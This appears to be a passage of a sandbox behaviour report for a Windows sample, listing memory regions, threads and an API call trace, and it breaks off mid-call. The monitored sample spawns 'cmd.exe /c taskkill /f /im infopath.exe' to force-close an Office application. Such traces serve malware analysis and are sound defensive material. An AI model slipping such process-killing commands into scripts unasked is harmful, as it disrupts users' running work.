Region: id = 4277 start_va = 0x7ff8798c0000 end_va = 0x7ff8798cafff monitored = 0 entry_point = 0x7ff8798c1cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 4278 start_va = 0x7ff87ab10000 end_va = 0x7ff87ac95fff monitored = 0 entry_point = 0x7ff87ab5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 4279 start_va = 0x7ff87ad00000 end_va = 0x7ff87ad12fff monitored = 0 entry_point = 0x7ff87ad02760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 4280 start_va = 0x7ff87afe0000 end_va = 0x7ff87b006fff monitored = 0 entry_point = 0x7ff87afe7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 4281 start_va = 0x7ff87b030000 end_va = 0x7ff87b0d9fff monitored = 0 entry_point = 0x7ff87b057910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 4282 start_va = 0x7ff87b340000 end_va = 0x7ff87b371fff monitored = 0 entry_point = 0x7ff87b352340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 4283 start_va = 0x7ff87b5c0000 end_va = 0x7ff87b5e3fff monitored = 0 entry_point = 0x7ff87b5c3260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 4284 start_va = 0x7ff87b760000 end_va = 0x7ff87b853fff monitored = 0 entry_point = 0x7ff87b76a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 4285 start_va = 0x7ff87b9d0000 end_va = 0x7ff87b9dbfff monitored = 0 entry_point = 0x7ff87b9d27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 4286 start_va = 0x7ff87bab0000 end_va = 0x7ff87bae0fff monitored = 0 entry_point = 0x7ff87bab7d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 4287 start_va = 0x7ff87bd20000 end_va = 0x7ff87bd3efff monitored = 0 entry_point = 0x7ff87bd25d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 4288 start_va = 0x7ff87be90000 end_va = 0x7ff87beebfff monitored = 0 entry_point = 0x7ff87bea6f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 4289 start_va = 0x7ff87c060000 end_va = 0x7ff87c06afff monitored = 0 entry_point = 0x7ff87c0619a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 4290 start_va = 0x7ff87c240000 end_va = 0x7ff87c26cfff monitored = 0 entry_point = 0x7ff87c259d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 4291 start_va = 0x7ff87c3d0000 end_va = 0x7ff87c425fff monitored = 0 entry_point = 0x7ff87c3e0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 4292 start_va = 0x7ff87c450000 end_va = 0x7ff87c478fff monitored = 0 entry_point = 0x7ff87c464530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 4293 start_va = 0x7ff87c5c0000 end_va = 0x7ff87c5cffff monitored = 0 entry_point = 0x7ff87c5c56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 4294 start_va = 0x7ff87c5d0000 end_va = 0x7ff87c5e3fff monitored = 0 entry_point = 0x7ff87c5d52e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 4295 start_va = 0x7ff87c5f0000 end_va = 0x7ff87c63afff monitored = 0 entry_point = 0x7ff87c5f35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 4296 start_va = 0x7ff87c640000 end_va = 0x7ff87c64efff monitored = 0 entry_point = 0x7ff87c643210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 4297 start_va = 0x7ff87c710000 end_va = 0x7ff87c752fff monitored = 0 entry_point = 0x7ff87c724b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 4298 start_va = 0x7ff87cdb0000 end_va = 0x7ff87ce35fff monitored = 0 entry_point = 0x7ff87cdbd8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 4299 start_va = 0x7ff87ce40000 end_va = 0x7ff87d027fff monitored = 0 entry_point = 0x7ff87ce6ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 4300 start_va = 0x7ff87d030000 end_va = 0x7ff87d099fff monitored = 0 entry_point = 0x7ff87d066d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 4301 start_va = 0x7ff87d170000 end_va = 0x7ff87d336fff monitored = 0 entry_point = 0x7ff87d1cdb80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 4302 start_va = 0x7ff87d3a0000 end_va = 0x7ff87d4e2fff monitored = 0 entry_point = 0x7ff87d3c8210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 4303 start_va = 0x7ff87ed60000 end_va = 0x7ff87eeb5fff monitored = 0 entry_point = 0x7ff87ed6a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 4304 start_va = 0x7ff87eed0000 end_va = 0x7ff87ef3afff monitored = 0 entry_point = 0x7ff87eee90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 4305 start_va = 0x7ff87efa0000 end_va = 0x7ff87efa7fff monitored = 0 entry_point = 0x7ff87efa1ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 4306 start_va = 0x7ff87f3e0000 end_va = 0x7ff87f565fff monitored = 0 entry_point = 0x7ff87f42ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 4307 start_va = 0x7ff87f640000 end_va = 0x7ff87f6ecfff monitored = 0 entry_point = 0x7ff87f6581a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 4308 start_va = 0x7ff87f6f0000 end_va = 0x7ff87f96cfff monitored = 0 entry_point = 0x7ff87f7c4970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 4309 start_va = 0x7ff87f970000 end_va = 0x7ff87f9cafff monitored = 0 entry_point = 0x7ff87f9838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 4310 start_va = 0x7ff87f9d0000 end_va = 0x7ff87fa76fff monitored = 0 entry_point = 0x7ff87f9db4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 4311 start_va = 0x7ff87fa80000 end_va = 0x7ff87fb40fff monitored = 0 entry_point = 0x7ff87faa0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 4312 start_va = 0x7ff87fd30000 end_va = 0x7ff87fdd6fff monitored = 0 entry_point = 0x7ff87fd458d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 4313 start_va = 0x7ff87fde0000 end_va = 0x7ff87fe7cfff monitored = 0 entry_point = 0x7ff87fde78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 4314 start_va = 0x7ff87fe80000 end_va = 0x7ff87ff9bfff monitored = 0 entry_point = 0x7ff87fec02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 4315 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4877 start_va = 0x1f00000 end_va = 0x1fd9fff monitored = 0 entry_point = 0x1f33c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Thread: id = 295 os_tid = 0xf78 Thread: id = 296 os_tid = 0xe28 Thread: id = 297 os_tid = 0x107c Thread: id = 298 os_tid = 0x1068 Thread: id = 299 os_tid = 0x103c Thread: id = 300 os_tid = 0xe14 Thread: id = 301 os_tid = 0x1324 Thread: id = 302 os_tid = 0x750 Thread: id = 303 os_tid = 0xfe0 Thread: id = 304 os_tid = 0xfcc Thread: id = 305 os_tid = 0xe00 Thread: id = 306 os_tid = 0xda8 Thread: id = 307 os_tid = 0x6d8 Thread: id = 308 os_tid = 0x458 Thread: id = 309 os_tid = 0x444 Thread: id = 310 os_tid = 0x440 Thread: id = 311 os_tid = 0x414 Thread: id = 312 os_tid = 0x410 Thread: id = 313 os_tid = 0x260 Thread: id = 314 os_tid = 0x270 Thread: id = 315 os_tid = 0x148 Thread: id = 316 os_tid = 0x1b4 Thread: id = 317 os_tid = 0x1b8 Thread: id = 318 os_tid = 0x184 Thread: id = 319 os_tid = 0x37c Process: id = "59" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2f228000" os_pid = "0xf60" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im infopath.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4385 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4386 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4387 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4388 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4389 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4390 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4391 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4392 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4393 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4394 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 4395 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 4396 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4397 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4398 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4399 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4400 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 4401 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4402 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 4403 start_va = 0x5d0000 end_va = 0x5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 4404 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4405 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4406 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4407 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4408 start_va = 0x5e0000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4409 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4410 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 4411 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 4412 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 4413 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 4414 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 4415 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 4416 start_va = 0x5e0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 4417 start_va = 0x760000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 4418 start_va = 0x860000 end_va = 0x95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 4419 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 4420 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4421 start_va = 0x960000 end_va = 0xc96fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 325 os_tid = 0xe68 [0206.131] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0206.131] __set_app_type (_Type=0x1) [0206.131] __p__fmode () returned 0x74974d6c [0206.131] __p__commode () returned 0x74975b1c [0206.131] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0206.131] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0206.131] GetCurrentThreadId () returned 0xe68 [0206.131] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe68) returned 0x78 [0206.132] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0206.132] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0206.132] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.139] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.139] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0206.139] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.139] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0206.139] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0206.139] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0206.139] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0206.139] GetConsoleOutputCP () returned 0x1b5 [0206.142] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0206.143] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0206.143] _get_osfhandle (_FileHandle=1) returned 0x154 [0206.143] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0206.143] _get_osfhandle (_FileHandle=1) returned 0x154 [0206.143] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0206.143] _get_osfhandle (_FileHandle=0) returned 0x144 [0206.143] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0206.143] GetEnvironmentStringsW () returned 0x767fe8* [0206.143] GetProcessHeap () returned 0x760000 [0206.143] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa1a) returned 0x768a10 [0206.143] FreeEnvironmentStringsA (penv="A") returned 1 [0206.143] GetProcessHeap () returned 0x760000 [0206.143] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x4) returned 0x767e68 [0206.143] GetEnvironmentStringsW () returned 0x767fe8* [0206.144] GetProcessHeap () returned 0x760000 [0206.144] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0xa1a) returned 0x769438 [0206.144] FreeEnvironmentStringsA (penv="A") returned 1 [0206.144] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0206.144] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0206.144] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.144] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0206.144] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.144] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.144] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.144] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0206.144] RegCloseKey (hKey=0x88) returned 0x0 [0206.145] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0206.145] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0206.145] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.145] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0206.145] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.145] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.145] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0206.145] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0206.145] RegCloseKey (hKey=0x88) returned 0x0 [0206.145] time (in: timer=0x0 | out: timer=0x0) returned 0x6234423c [0206.145] srand (_Seed=0x6234423c) [0206.145] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im infopath.exe \"" [0206.145] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im infopath.exe \"" [0206.145] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0206.145] GetProcessHeap () returned 0x760000 [0206.145] RtlAllocateHeap (HeapHandle=0x760000, Flags=0x8, Size=0x210) returned 0x766f98 [0206.146] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x766fa0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0206.146] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0206.146] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | 